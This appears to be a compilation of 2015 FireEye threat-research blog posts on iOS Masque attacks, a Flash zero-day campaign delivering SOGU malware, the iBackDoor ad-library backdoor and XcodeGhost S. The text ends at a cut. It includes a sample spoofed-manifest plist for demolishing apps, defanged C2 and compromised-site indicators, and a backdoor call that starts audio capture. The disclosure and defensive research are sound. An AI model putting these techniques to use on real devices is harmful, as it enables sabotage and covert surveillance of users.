The control panel contains a view that lists the “tracks,” or stolen payment card data. This indicates that this panel is for malware capable of stealing data from POS machines that matches up with the capability of the NitlovePOS malware.

Conclusion

Even cybercriminals engaged in indiscriminate spam operations have POS malware available and can deploy it to s subset of their victims. Due to the widespread use of POS malware, they are eventually discovered and detection increases. However, this is followed by the development of new POS with very similar functionality. Despite the similarity, the detection levels for new variants are initially quite low. This gives the cybercriminals a window of opportunity to exploit the use of a new variant.

We expect that new versions of functionally similar POS malware will continue to emerge to meet the demand of the cybercrime marketplace.

Three New Masque Attacks against iOS: Demolishing, Breaking and Hijacking

30 June 2015 at 14:00

In the recent release of iOS 8.4, Apple fixed several vulnerabilities including vulnerabilities that allow attackers to deploy two new kinds of Masque Attack (CVE-2015-3722/3725, and CVE-2015-3725). We call these exploits Manifest Masque and Extension Masque, which can be used to demolish apps, including system apps (e.g., Apple Watch, Health, Pay and so on), and to break the app data container. In this blog, we also disclose the details of a previously fixed, but undisclosed, masque vulnerability: Plugin Masque, which bypasses iOS entitlement enforcement and hijacks VPN traffic. Our investigation also shows that around one third of iOS devices still have not updated to versions 8.1.3 or above, even 5 months after the release of 8.1.3, and these devices are still vulnerable to all the Masque Attacks.

We have disclosed five kinds of Masque Attacks, as shown in the following table.

Name

Consequences disclosed till now

Mitigation status

App Masque

* Replace an existing app

* Harvest sensitive data

Fixed in iOS 8.1.3 [6]

URL Masque

* Bypass prompt of trust

* Hijack inter-app communication

Partially fixed in iOS 8.1.3 [11]

Manifest Masque

* Demolish other apps (incl. Apple Watch, Health, Pay, etc.) during over-the-air installations

Partially fixed in iOS 8.4

Plugin Masque

* Bypass prompt of trust

* Bypass VPN plugin entitlement

* Replace an existing VPN plugin

* Hijack device traffic

* Prevent device from rebooting

* Exploit more kernel vulnerabilities

Fixed in iOS 8.1.3

Extension Masque

* Access another app’s data

* Or prevent another app to access its own data

Partially fixed in iOS 8.4

Manifest Masque Attack leverages the CVE-2015-3722/3725 vulnerability to demolish an existing app on iOS when a victim installs an in-house iOS app wirelessly using enterprise provisioning from a website. The demolished app (the attack target) can be either a regular app downloaded from official App Store or even an important system app, such as Apple Watch, Apple Pay, App Store, Safari, Settings, etc. This vulnerability affects all iOS 7.x and iOS 8.x versions prior to iOS 8.4. We first notified Apple of this vulnerability in August 2014.

Extension Masque Attack can break the restrictions of app data container. A malicious app extension installed along with an in-house app on iOS 8 can either gain full access to a targeted app’s data container or prevent the targeted app from accessing its own data container. On June 14, security researchers Luyi, Xiaofeng et al. disclosed several severe issues on OS X, including a similar issue with this one [5]. They did remarkable research, but happened to miss this on iOS. Their report claimed: “this security risk is not present on iOS”. However, the data container issue does affect all iOS 8.x versions prior to iOS 8.4, and can be leveraged by an attacker to steal all data in a target app’s data container. We independently discovered this vulnerability on iOS and notified Apple before the report [5] was published, and Apple fixed this issue as part of CVE-2015-3725.

In addition to these two vulnerabilities patched on iOS 8.4, we also disclose the detail of another untrusted code injection attack by replacing the VPN Plugin, the Plugin Masque Attack. We reported this vulnerability to Apple in Nov 2014, and Apple fixed the vulnerability on iOS 8.1.3 when Apple patched the original Masque Attack (App Masque) [6, 11]. However, this exploit is even more severe than the original Masque Attack. The malicious code can be injected to the neagent process and can perform privileged operations, such as monitoring all VPN traffic, without the user’s awareness. We first demonstrated this attack in the Jailbreak Security Summit [7] in April 2015. Here we categorize this attack as Plugin Masque Attack.

We will discuss the technical details and demonstrate these three kinds of Masque Attacks.

Manifest Masque: Putting On the New, Taking Off the Old

To distribute an in-house iOS app with enterprise provisioning wirelessly, one has to publish a web page containing a hyperlink that redirects to a XML manifest file hosted on an https server [1]. The XML manifest file contains metadata of the in-house app, including its bundle identifier, bundle version and the download URL of the .ipa file, as shown in Table 1. When installing the in-house iOS app wirelessly, iOS downloads this manifest file first and parse the metadata for the installation process.

<a href="itms-services://?action=downloadmanifest&url=https://example.com/manifest. plist">Install App</a>

 

<plist>

      <array>

          <dict>

             ...

             <key>url</key>

             <string>https://XXXXX.com/another_browser.ipa</string>

            ...

             <key>bundle-identifier</key>

             <string>com.google.chrome.ios</string>

             …

             <key>bundle-version</key>

             <string>1000.0</string>

           </dict>

           <dict>

              … Entries For Another App

           </dict>

       <array>

</plist>

Table 1. An example of the hyperlink and the manifest file

According to Apple’s official document [1], the bundle-identifier field should be “Your app’s bundle identifier, exactly as specified in your Xcode project”. However, we have discovered that iOS doesn’t verify the consistency between the bundle identifier in the XML manifest file on the website and the bundle identifier within the app itself. If the XML manifest file on the website has a bundle identifier equivalent to that of another genuine app on the device, and the bundle-version in the manifest is higher than the genuine app’s version, the genuine app will be demolished down to a dummy placeholder, whereas the in-house app will still be installed using its built-in bundle id. The dummy placeholder will disappear after the victim restarts the device. Also, as shown in Table 1, a manifest file can contain different apps’ metadata entries to distribute multiple apps at a time, which means this vulnerability can cause multiple apps being demolished with just one click by the victim.

By leveraging this vulnerability, one app developer can install his/her own app and demolish other apps (e.g. a competitor’s app) at the same time. In this way, attackers can perform DoS attacks or phishing attacks on iOS.

Figure 1. Phishing Attack by installing “malicious Chrome” and demolishing the genuine one

Figure 1 shows an example of the phishing attack. When the user clicks a URL in the Gmail app, this URL is rewritten with the “googlechrome-x-callback://” scheme and supposed to be handled by Chrome on the device. However, an attacker can leverage the Manifest Masque vulnerability to demolish the genuine Chrome and install “malicious Chrome” registering the same scheme. Other than requiring the same bundle identifier to replace a genuine app in the original Masque Attack [xx], the malicious chrome in this phishing attack uses a different bundle identifier to bypass the installer’s bundle identifier validation. Later, when the victim clicks a URL in the Gmail app, the malicious Chrome can take over the rewritten URL scheme and perform more sophisticated attacks.

What’s worse, an attacker can also exploit this vulnerability to demolish all system apps (e.g. Apple Watch, Apple Pay UIService, App Store, Safari, Health, InCallService, Settings, etc.). Once demolished, these system apps will no longer be available to the victim, even if the victim restarts the device.

Here we demonstrate this DoS attack on iOS 8.3 to demolish all the system apps and one App Store app (i.e. Gmail) when the victim clicks only once to install an in-house app wirelessly. Note that after rebooting the device, all the system apps still remain demolished while the App Store app would disappear since it has already been uninstalled.

Second Adobe Flash Zero-Day CVE-2015-5122 from HackingTeam Exploited in Strategic Web Compromise Targeting Japanese Victims

On July 14, FireEye researchers discovered attacks exploiting the Adobe Flash vulnerability CVE-2015-5122, just four days after Adobe released a patch. CVE-2015-5122 was the second Adobe Flash zero-day revealed in the leak of HackingTeam’s internal data. The campaign targeted Japanese organizations by using at least two legitimate Japanese websites to host a strategic web compromise (SWC), where victims ultimately downloaded a variant of the SOGU malware.

Strategic Web Compromise

At least two different Japanese websites were compromised to host the exploit framework and malicious downloads:

  • Japan’s International Hospitality and Conference Service Association (IHCSA) website (hxxp://www.ihcsa[.]or[.]jp) in Figure 1

    Figure 1: IHCSA website

  • Japan’s Cosmetech Inc. website (hxxp://cosmetech[.]co[.]jp)

The main landing page for the attacks is a specific URL seeded on the IHCSA website (hxxp://www.ihcsa[.]or[.]jp/zaigaikoukan/zaigaikoukansencho-1/), where users are redirected to the HackingTeam Adobe Flash framework hosted on the second compromised Japanese website. We observed in the past week this same basic framework across several different SWCs exploiting the “older” CVE-2015-5119 Adobe Flash vulnerability in Figure 2.

    Figure 2: First portion of exploit chain

The webpage (hxxp://cosmetech[.]co[.]jp/css/movie.html) is built with the open source framework Adobe Flex and checks if the user has at least Adobe Flash Player version 11.4.0 installed. If the victim has the correct version of Flash, the user is directed to run a different, more in-depth profiling script (hxxp://cosmetech.co.jp/css/swfobject.js), which checks for several more conditions in addition to their version of Flash. If the conditions are not met then the script will not attempt to load the Adobe Flash (SWF) file into the user’s browser. In at least two of the incidents we observed, the victims were running Internet Explorer 11 on Windows 7 machines.

The final component is delivering a malicious SWF file, which we confirmed exploits CVE-2015-5122 on Adobe Version 18.0.0.203 for Windows in Figure 3.

    Figure 3: Malicious SWF download

SOGU Malware, Possible New Variant

After successful exploitation, the SWF file dropped a SOGU variant—a backdoor widely used by Chinese threat groups and also known as “Kaba”—in a temporary directory under “AppData\Local\”. The directory contains the properties and configuration in Figure 4.

    Filename: Rdws.exe

    Size: 413696 bytes

    MD5: 5a22e5aee4da2fe363b77f1351265a00

    Compile Time: 2015-07-13 08:11:01

    SHA256: df5f1b802d553cddd3b99d1901a87d0d1f42431b366cfb0ed25f465285e38d27

    SSDeep:6144:Na/PSOE9OPXCQpA3abFUntBrDP3FVPsCE2NiYfFei78GlGeYO:IPSOE9OPXCQ
    pAK5YBvPPPrZVkiY2Y

    Import Hash: ae984e4ab41d192d631d4f923d9210e4

    PEHash: 57e6b26eac0f34714252957d26287bc93ef07db2

    .text: e683e1f9fb674f97cf4420d15dc09a2b

    .rdata: 3a92b98a74d7ffb095fe70cf8acacc75

    .data: b5d4f68badfd6e3454f8ad29da54481f

    .rsrc: 474f9723420a3f2d0512b99932a50ca7

    C2 Password: gogogod<

    Memo: 201507122359

    Process Inject Targets: %windir%\system32\svchost.exe

    Sogu Config Encoder: sogu_20140307

    Mutex Name: ZucFCoeHa8KvZcj1FO838HN&*wz4xSdmm1

    Figure 4: SOGU Binary ‘Rdws.exe’

The compile timestamp indicates the malware was assembled on July 13, less than a day before we observed the SWC. We believe the time stamp in this case is likely genuine, based on the time line of the incident. The SOGU binary also appears to masquerade as a legitimate Trend Micro file named “VizorHtmlDialog.exe” in Figure 5.

    LegalCopyright: Copyright (C) 2009-2010 Trend Micro Incorporated. All rights reserved.

    InternalName: VizorHtmlDialog

    FileVersion: 3.0.0.1303

    CompanyName: Trend Micro Inc.

    PrivateBuild: Build 1303 - 8/8/2010

    LegalTrademarks: Trend Micro Titanium is a registered trademark of Trend Micro Incorporated.

    Comments:

    ProductName: Trend Micro Titanium

    SpecialBuild: 1303

    ProductVersion: 3.0

    FileDescription: Trend Titanium

    OriginalFilename: VizorHtmlDialog.exe

    Figure 5: Rdws.exe version information

The threat group likely used Trend Micro, a security software company headquartered in Japan, as the basis for the fake file version information deliberately, given the focus of this campaign on Japanese organizations.

SOGU Command and Control

The SOGU variant calls out to a previously unobserved command and control (CnC) domain, “amxil[.]opmuert[.]org” over port 443 in Figure 6. It uses modified DNS TXT record beaconing with an encoding we have not previously observed with SOGU malware, along with a non-standard header, indicating that this is possibly a new variant.

    Figure 6: SOGU C2 beaconing

The WHOIS registrant email address for the domain did not indicate any prior malicious activity, and the current IP resolution (54.169.89.240) is for an Amazon Web Services IP address.

Another Quick Turnaround on Leveraging HackingTeam Zero-Days

Similar to the short turnaround time highlighted in our blog on the recent APT3/APT18 phishing attacks, the threat actor quickly employed the leaked zero-day vulnerability into a SWC campaign. The threat group appears to have used procured and compromised infrastructure to target Japanese organizations. In two days we have observed at least two victims related to this attack.

We cannot confirm how the organizations were targeted, though similar incidents involving SWC and exploitation of the Flash vulnerability CVE-2015-5119 lured victims with phishing emails. Additionally, the limited popularity of the niche site also contributes to our suspicion that phishing emails may have been the lure, and not incidental web browsing.

Malware Overlap with Other Chinese Threat Groups

We believe that this is a concerted campaign against Japanese companies given the nature of the SWC. The use of SOGU malware and dissemination method is consistent with the tactics of Chinese APT groups that we track. Chinese APT groups have previously targeted the affected Japanese organizations, but we have yet to confirm which group is responsible for this campaign.

Why Japan?

In this case, we do not have enough information to discern specifically what the threat actors may have been pursuing. The Japanese economy’s technological innovation and strengths in high-tech and precision goods have attracted the interest of multiple Chinese APT groups, who almost certainly view Japanese companies as a rich source of intellectual property and competitive intelligence. The Japanese government and military organizations are also frequent targets of cyber espionage.[1]  Japan’s economic influence, alliance with the United States, regional disputes, and evolving defense policies make the Japanese government a dedicated target of foreign intelligence.

Recommendations

FireEye maintains endpoint and network detection for CVE-2015-5122 and the backdoor used in this campaign. FireEye products and services identify this activity as SOGU/Kaba within the user interface. Additionally, we highly recommend:

  • Applying Adobe’s newest patch for Flash immediately;
  • Querying for additional activity by the indicators from the compromised Japanese websites and the SOGU malware callbacks;
  • Blocking CnC addresses via outbound communications; and
  • Scope the environment to prepare for incident response.

     

    [1] Humber, Yuriy and Gearoid Reidy. “Yahoo Hacks Highlight Cyber Flaws Japan Rushing to Twart.” BloombergBusiness. 8 July 2014. http://www.bloomberg.com/news/articles/2014-07-08/yahoo-hacks-highlight-cyber-flaws-japan-rushing-to-thwart

    Japanese Ministry of Defense. “Trends Concerning Cyber Space.” Defense of Japan 2014.  http://www.mod.go.jp/e/publ/w_paper/pdf/2014/DOJ2014_1-2-5_web_1031.pdf

    LAC Corporation. “Cyber Grid View, Vol. 1.” http://www.lac.co.jp/security/report/pdf/apt_report_vol1_en.pdf

    Otake, Tomoko. “Japan Pension Service hack used classic attack method.” Japan Times. 2 June 2015. http://www.japantimes.co.jp/news/2015/06/02/national/social-issues/japan-pension-service-hack-used-classic-attack-method/

     

Windows Management Instrumentation (WMI) Offense, Defense, and Forensics

8 August 2015 at 18:45

Windows Management Instrumentation (WMI) is a remote management framework that enables the collection of host information, execution of code, and provides an eventing system that can respond to operating system events in real time. FireEye has recently seen a surge in attacker use of WMI to carry out objectives such as system reconnaissance, remote code execution, persistence, lateral movement, covert data storage, and VM detection. Defenders and forensic analysts have largely remained unaware of the value of WMI due to its relative obscurity and completely undocumented file format. After extensive reverse engineering, the FireEye FLARE team has documented the WMI repository file format in detail, developed libraries to parse it, and formed a methodology for finding evil in the repository.

The FLARE team is now publishing a whitepaper that takes a deep dive into the architecture of WMI, reveals case studies in attacker use of WMI in the wild, describes WMI attack mitigation strategies, and shows how to mine its repository for forensic artifacts. The document also demonstrates how to detect attacker activity in real-time by tapping into the WMI eventing system. WMI is a valuable asset not just for system administrators and attackers, but equally so for defenders and forensic analysts. Download a copy of the whitepaper today!

2015 FLARE-ON Challenge Solutions

8 September 2015 at 14:56

The first few challenges narrowed the playing field drastically, with most serious contestants holding firm through challenges 4-9. The last two increased the difficulty level and proved a difficult final series of challenges for a well-earned finish line.

The FLARE On Challenge always reaches a very wide international audience. Outside of the USA, this year’s country with the most finishers was China, with and impressive 11 winners. I hope that massive shipment of belt buckles doesn’t get caught up in customs! The performance of contestants from Vietnam and Slovakia were also particularly commendable, as both held early leads in total finishers. Based on the locations we are sending the challenge prizes to (people who responded with their shipping info by noon today) we can say that 33 countries had finishers this year. This next graphs shows the total winners by country this year.

And without further ado, here are the solutions for this year’s challenges, each written by their respective challenge creator.

1.     CLICK HERE FOR SOLUTION #1  

2.     CLICK HERE FOR SOLUTION #2  

3.     CLICK HERE FOR SOLUTION #3  

4.     CLICK HERE FOR SOLUTION #4  

5.     CLICK HERE FOR SOLUTION #5  

6.     CLICK HERE FOR SOLUTION #6  

7.     CLICK HERE FOR SOLUTION #7  

8.     CLICK HERE FOR SOLUTION #8  

9.     CLICK HERE FOR SOLUTION #9  

10.   CLICK HERE FOR SOLUTION #10  

11.   CLICK HERE FOR SOLUTION #11  

We hope you had fun and learned something new about reverse engineering! Stay tuned for the third FLARE On Challenge coming in 2016!

iBackDoor: High-risk Code Sneaks into the App Store

26 October 2015 at 13:51

The library embeds backdoors in unsuspecting apps that make use of it to display ads, exposing sensitive data and functionality. The backdoors can be controlled remotely by loading JavaScript code from remote servers to perform the following actions:

  • Capture audio and screenshots.
  • Monitor and upload device location.
  • Read/delete/create/modify files in the app’s data container.
  • Read/Write/Reset the app’s keychain (e.g., app password storage).
  • Post encrypted data to remote servers.
  • Open URL schemes to identify and launch other apps installed on the device.
  • “Side-load” non-App Store apps by prompting the user to click an “Install” button.

The offending ad library contains identifying data suggesting that it is a version of the mobiSage SDK [1]. We found 17 distinct versions of the backdoored ad library, with version codes between 5.3.3 and 6.4.4. However, in the latest mobiSage SDK publicly released by adSage [2], identified as version 7.0.5, the backdoors are not present. We cannot determine with certainty whether the backdoored versions of the library were actually released by adSage, or whether they were created and/or compromised by a third party.

As of publication of this blog, we have identified 2846 apps published in the App Store containing backdoored versions of mobiSage SDK. Among these 2846 apps, we have observed over 900 attempt to contact their command and control (C2) server. We have notified Apple and provided the details to them.

These backdoors can be controlled not only by the original creators of the ad library, but potentially also by outside threat actors. While we have not observed commands from the C2 server intended to trigger the most sensitive capabilities such recording audio or stealing sensitive data, there are several ways that the backdoors could be abused by third-party targeted attackers to further compromise the security and privacy of the device and user:

  • An attacker could reverse-engineer the insecure HTTP-based control protocol between the ad library and its server, and then hijack the connection to insert commands to trigger the backdoors and steal sensitive information.
  • A malicious app developer can similarly inject commands, utilizing the library’s backdoors to build their own surveillance app. Since the ad library has passed the App Store review process in numerous apps, this is an attractive way to create an app with these hidden behaviors that will pass under Apple’s radar.

App Store Protections Ineffective

Despite Apple’s reputation for keeping malware out of the App Store with its strict review process, this case demonstrates that it is still possible for dangerous code that exposes users to critical security and privacy risks to sneak into the App Store by piggybacking on unsuspecting apps. Backdoors that enable silently recording audio and uploading sensitive data when triggered by downloaded code clearly violate the requirements of the iOS Developer Program [3]. The requirements state that apps are not permitted to download code or scripts, with the exception of scripts that “do not change the primary purpose of the Application by providing features or functionality that are inconsistent with the intended and advertised purpose of the Application as submitted to the App Store.” And, for apps that can record audio, “a reasonably conspicuous audio, visual or other indicator must be displayed to the user as part of the Application to indicate that a Recording is taking place.”  The backdoored versions of mobiSage clearly violate these requirements, yet thousands of affected apps made it past the App Store review process.

Technical Details

As shown in Figure 1, the backdoored mobiSage library includes two key components, separately implemented in Objective-C and JavaScript. The Objective-C component, which we refer to as msageCore, implements the underlying functionality of the backdoors and exposes interfaces to the JavaScript context through a WebView. The JavaScript component, which we refer to as msageJS, provides high-level execution logic and can trigger the backdoors by invoking the interfaces exposed by msageCore. Each component has its own separate version number.

 

Figure 1: Key components of backdoored mobiSage SDK

In the remainder of this section, we reveal internal details of msageCore, including its communication channel and high-risk interfaces. Then, we describe how msageJS is launched and updated, and how it can trigger the backdoors.

Backdoors in msageCore

Communication channel

MsageCore implements a general framework to communicate with msageJS via the ad library’s WebView. Commands and parameters are passed via specially crafted URLs in the format  adsagejs://cmd&parameter. As shown in the reconstructed code fragment in Figure 2, msageCore fetches the command and parameters from the JavaScript context and inserts them in its command queue.

 

 

Figure 2: Communication via URL loading in WebView.

To process a command in its queue, msageCore dispatches the command along with its parameters to a corresponding Objective-C class and method. Figure 3 shows portions of the reconstructed command dispatching code.

 

 

Figure 3: Command dispatch in msageCore.

High-risk interfaces

Each dispatched command ultimately arrives at an Objective-C class in msageCore. Table 1 shows a subset of msageCore classes and the corresponding interfaces that they expose.

msageCore Class Name

Interfaces

MSageCoreUIManagerPlugin

- captureAudio:

- captureImage:

- openMail:

- openSMS:

- openApp:

- openInAppStore:

- openCamera:

- openImagePicker:

- ...

MSageCoreLocation

- start:

- stop:

- setTimer:

- returnLocationInfo:webViewId:

- ...

MSageCorePluginFileModule

 

- createDir

- deleteDir:

- deleteFile:

- createFile:

- getFileContent:

- ...

MSageCoreKeyChain

- writeKeyValue:

- readValueByKey:

- resetValueByKey:

MSageCorePluginNetWork

- sendHttpGet:

- sendHttpPost:

- sendHttpUpload:

- ...

MSageCoreEncryptPlugin

- MD5Encrypt:

- SHA1Encrypt:

- AESEncrypt:

- AESDecrypt:

- DESEncrypt:

- DESDecrypt:

- XOREncrypt:

- XORDecrypt:

- RC4Encrypt:

- RC4Decrypt

- ...

Table 1: Selected interfaces exposed by msageCore

The selected interfaces reveal some of the key capabilities exposed by the backdoors in the library. They expose the ability to capture audio and screenshots while the affected app is in use, identify and launch other apps installed on the device, periodically monitor location, read and write files in the app’s data container, and read/write/reset “secure” keychain items stored by the app. Additionally, any data collected via these interfaces can be encrypted with various encryption schemes and uploaded to a remote server.

 

Beyond the selected interfaces, the ad library exposes users to additional risks by including explicit logic to promote and install “enpublic” apps shown in Figure 4. As we have highlighted in previous blogs [4, 5, 6, 7, 8], enpublic apps can introduce additional security risks by using private APIs, which would normally cause an app to be blocked by the App Store review process. In previous blogs we have described a number of “Masque” attacks utilizing enpublic apps [5, 6, 7], which affect pre-iOS 9 devices. The attacks include background monitoring of SMS or phone calls, breaking the app sandbox, stealing email messages, and demolishing arbitrary app installations.

 

 

Figure 4: Installing “enpublic” apps to bypass Apple App Store review

 

We can observe the functionality of the ad library by examining the implementations of some of the selected interfaces. Figure 5 shows reconstructed code snippets for capturing audio. Before storing recorded audio to a file audio_xxx.wav, the code retrieves two parameters from the command for recording duration and threshold.

 

 

Figure 5: Capturing audio with duration and threshold.

 

Figure 6 shows a code snippet for initializing the app’s keychain before reading. The accessed keychain is in the kSecClassGenericPassword class, which is widely used by apps for storing secret credentials such as passwords.

 

 

Figure 6: Reading the keychain in the kSecClassGenericPassword class.

Remote control in msageJS

msageJS contains JavaScript code for communicating with a C2 server and submitting commands to msageCore. The file layout of msageJS is shown in Figure 7. Inside sdkjs.js, we find a wrapper object called adsage and the JavaScript interface for command execution.

 

 

Figure 7: The file layout of msageJS

 

The command execution interface is constructed as follows:

 

          adsage.exec(className, methodName, argsList, onSuccess, onFailure);

 

The className and methodName parameters correspond to classes and methods in msageCore. The argsList parameter can be either a list or dict, and the exact types and values can be determined by reversing the methods in msageCore. The final two parameters are function callbacks invoked when the method exits. For example, the following invocation starts audio capture:

 

adsage.exec("MSageCoreUIManager", "captureAudio", ["Hey", 10, 40],  onSuccess, onFailure);

 

Note that the files comprising msageJS cannot be found by simply listing the files in an affected app’s IPA. The files themselves are zipped and encoded in Base64 in the data section of the ad library binary. After an affected app is launched, msageCore first decodes the string and extracts msageJS to the app’s data container, setting index.html shown in Figure 7 as the landing page in the ad library WebView to launch msageJS.

 

 

Figure 8: Base64 encoded JavaScript component in zip format.

 

When msageJS is launched, it sends a POST request to hxxp://entry.adsage.com/d/ to check for updates. The server responds with information about the latest msageJS version, including a download URL, as shown in Figure 9. Note that since the request uses HTTP rather than HTTPS, the response can be hijacked easily by a network attacker, who could replace the download URL with a link to malicious JavaScript code that triggers the backdoors.

 

Figure 9: Server response to msageJS update request via HTTP POST

Conclusion

In this blog, we described a high-risk ad library affecting thousands of iOS apps in the Apple App Store. We revealed the internals of backdoors which can be used to silently record audio, capture screenshots, prompt the user to side-load other high-risk apps, and read sensitive data from the app’s keychain, among other dubious capabilities. We also showed how these backdoors can be controlled remotely by JavaScript code fetched from the Internet in an insecure manner.

 

FireEye Protection

Immediately after we discovered the high-risk ad library and affected apps, FireEye updated detection rules in its NX and Mobile Threat Prevention (MTP) products to detect the affected apps and their network activities. In addition, FireEye customers can access the full list of affected apps upon request.

FireEye NX customers are alerted if an employee uses an infected app while their iOS device is connected to the corporate network. It is important to note that, even if the servers that the backdoored mobiSage SDK communicates with do not deliver JavaScript code that triggers the high-risk backdoors, the affected apps still try to connect to them using HTTP. This HTTP session is vulnerable to hijacking by outside attackers.

FireEye MTP management customers have full visibility into high-risk apps installed on mobile devices in their deployment base. End users receive on-device notifications of the detection and IT administrators receive email alerts.

Click here to learn more about FireEye Mobile Threat Protection product.

 

 

 

[1] http://www.adsage.com/mobisage

[2] http://www.adsage.cn/

[3] https://developer.apple.com/programs/ios/information/iOS_Program_Information_4_3_15.pdf [4] https://www.fireeye.com/blog/threat-research/2015/08/ios_masque_attackwe.html

[5] https://www.fireeye.com/blog/threat-research/2015/02/ios_masque_attackre.html

[6] https://www.fireeye.com/blog/threat-research/2014/11/masque-attack-all-your-ios-apps-belong-to-us.html

[7] https://www.fireeye.com/blog/threat-research/2015/06/three_new_masqueatt.html

[8] https://www.virusbtn.com/virusbulletin/archive/2014/11/vb201411-Apple-without-shell

 

 

 

 

XcodeGhost S: A New Breed Hits the US

By: Yong Kang
3 November 2015 at 12:27

Just over a month ago, iOS users were warned of the threat to their devices by the XcodeGhost malware. Apple quickly reacted, taking down infected apps from the App Store and releasing new security features to stop malicious activities. Through continuous monitoring of our customers’ networks, FireEye researchers have found that, despite the quick response, the threat of XcodeGhost has maintained persistence and been modified.

More specifically, we found that:

  • XcodeGhost has entered into U.S. enterprises and is a persistent security risk
  • Its botnet is still partially active
  • A variant we call XcodeGhost S reveals more advanced samples went undetected

After monitoring XcodeGhost related activity for four weeks, we observed 210 enterprises with XcodeGhost-infected applications running inside their networks, generating more than 28,000 attempts to connect to the XcodeGhost Command and Control (CnC) servers -- which, while not under attacker control, are vulnerable to hijacking by threat actors. Figure 1 shows the top five countries XcodeGhost attempted to callback to during this time.

Figure 1. Top five countries XcodeGhost attempted to callback in a four-week span

The 210 enterprises we detected with XcodeGhost infections represent a wide range of industries. Figure 2 shows the top five industries affected by XcodeGhost, sorted by the percentage of callback attempts to the XcodeGhost CnC servers from inside their networks:

Figure 2: Top five industries affected based on callback attempts

Researchers have demonstrated how XcodeGhost CnC traffic can be hijacked to:

  • Distribute apps outside the App Store
  • Force browse to URL
  • Aggressively promote any app in the App Store by launching the download page directly
  • Pop-up phishing windows

Figure 3 shows the top 20 most active infected apps among 152 apps, based on data from our DTI cloud:

Figure 3: Top 20 infected apps

Although most vendors have already updated their apps on App Store, this chart indicates many users are actively using older, infected versions of various apps in the field. The version distribution varies among apps. For example, the most popular Apps 网易云音乐 and WeChat-infected versions are listed in Figure 4.

App Name

Version

Incident Count (in 3 weeks)

WeChat

6.2.5.19

2963

网易云音乐

Music 163

2.8.2

3084

2.8.3

2664

2.8.1

1227

Figure 4: Sample infected app versions

The infected iPhones are running iOS versions from 6.x.x to 9.x.x as illustrated by Figure 5. It is interesting to note that nearly 70% of the victims within our customer base remain on older iOS versions. We encourage them to update to the latest version iOS 9 as quickly as possible.

Figure 5: Distribution of iOS versions running infected apps

Some enterprises have taken steps to block the XcodeGhost DNS query within their network to cut off the communication between employees’ iPhones and the attackers’ CnC servers to protect them from being hijacked. However, until these employees update their devices and apps, they are still vulnerable to potential hijacking of the XcodeGhost CnC traffic -- particularly when outside their corporate networks.

Given the number of infected devices detected within a short period among so many U.S enterprises, we believe that XcodeGhost continues to be an ongoing threat for enterprises.

XcodeGhost Modified to Exploit iOS 9

We have worked with Apple to have all XcodeGhost and XcodeGhost S (described below) samples we have detected removed from the App Store.

XcodeGhost is planted in different versions of Xcode, including Xcode 7 (released for iOS 9 development). In the latest version, which we call XcodeGhost S, features have been added to infect iOS 9 and bypass static detection.

According to [1], Apple introduced the “NSAppTransportSecurity” approach for iOS 9 to improve client-server connection security. By default, only secure connections (https with specific ciphers) are allowed on iOS 9. Due to this limitation, previous versions of XcodeGhost would fail to connect with the CnC server by using http. However, Apple also allows developers to add exceptions (“NSAllowsArbitraryLoads”) in the app’s Info.plist to allow http connection. As shown in Figure 6, the XcodeGhost S sample reads the setting of “NSAllowsArbitraryLoads” under the “NSAppTransportSecurity” entry in the app’s Info.plist and picks different CnC servers (http/https) based on this setting.

Figure 6: iOS 9 adoption in XcodeGhost S

Further, the CnC domain strings are concatenated character by character to bypass the static detection in XcodeGhost S, such behavior is shown in Figure 7.

Figure 7: Construct the CnC domain character by character

The FireEye iOS dynamic analysis platform has successfully detected an app  (“自由邦”)  [2] infected by XcodeGhost S and this app has been taken down from App Store in cooperation with Apple. It is a shopping app for travellers and is available on both U.S. and CN App Stores. As shown in Figure 8, the infected app’s version is 2.6.6, updated on Sep. 15.

Figure 8: An App Store app is infected with XcodeGhost S

Enterprise Protection

FireEye MTP has detected and assisted in Apple’s takedown of thousands of XcodeGhost-infected iOS applications. We advise all organizations to notify their employees of the threat of XcodeGhost and other malicious iOS apps. Employees should make sure that they update all apps to the latest version. For the apps Apple has removed, users should remove the apps and switch to other uninfected apps on App Store.

FireEye MTP management customers have full visibility into which mobile devices are infected in their deployment base. We recommend that customers immediately review MTP alerts, locate infected devices/users, and quarantine the devices until the infected apps are removed. FireEye NX customers are advised to immediately review alert logs for activities related to XcodeGhost communications.

[1] https://developer.apple.com/library/prerelease/ios/technotes/App-Transport-Security-Technote/
[2] https://itunes.apple.com/us/app/id915233927
[3] http://drops.wooyun.org/papers/9024
[4] https://itunes.apple.com/us/app/pdf-reader-annotate-scan-sign/id368377690?mt=8
[5] https://itunes.apple.com/us/app/winzip-leading-zip-unzip-cloud/id500637987?mt=8
[7] https://www.fireeye.com/blog/threat-research/2015/08/ios_masque_attackwe.html
[8] https://www.fireeye.com/blog/threat-research/2015/02/ios_masque_attackre.html
[9] https://www.fireeye.com/blog/threat-research/2014/11/masque-attack-all-your-ios-apps-belong-to-us.html
[10] https://www.fireeye.com/blog/threat-research/2015/06/three_new_masqueatt.html

iBackDoor: High-Risk Code Hits iOS Apps

4 November 2015 at 18:00

Introduction

FireEye mobile researchers recently discovered potentially “backdoored” versions of an ad library embedded in thousands of iOS apps originally published in the Apple App Store. The affected versions of this library embedded functionality in iOS apps that used the library to display ads, allowing for potential malicious access to sensitive user data and device functionality. NOTE: Apple has worked with us on the issue and has since removed the affected apps.

These potential backdoors could have been controlled remotely by loading JavaScript code from a remote server to perform the following actions on an iOS device:

  • Capture audio and screenshots
  • Monitor and upload device location
  • Read/delete/create/modify files in the app’s data container
  • Read/write/reset the app’s keychain (e.g., app password storage)
  • Post encrypted data to remote servers
  • Open URL schemes to identify and launch other apps installed on the device
  • “Side-load” non-App Store apps by prompting the user to click an “Install” button

The offending ad library contained identifying data suggesting that it is a version of the mobiSage SDK [1]. We found 17 distinct versions of the potentially backdoored ad library: version codes 5.3.3 to 6.4.4. However, in the latest mobiSage SDK publicly released by adSage [2] – version 7.0.5 – the potential backdoors are not present. It is unclear whether the potentially backdoored versions of the ad library were released by adSage or if they were created and/or compromised by a malicious third party.

As of November 4, we have identified 2,846 iOS apps containing the potentially backdoored versions of mobiSage SDK. Among these, we observed more than 900 attempts to contact an ad adSage server capable of delivering JavaScript code to control the backdoors. We notified Apple of the complete list of affected apps and technical details on October 21, 2015.

While we have not observed the ad server deliver any malicious commands intended to trigger the most sensitive capabilities such as recording audio or stealing sensitive data, affected apps periodically contact the server to check for new JavaScript code. In the wrong hands, malicious JavaScript code that triggers the potential backdoors could be posted to eventually be downloaded and executed by affected apps.

Technical Details

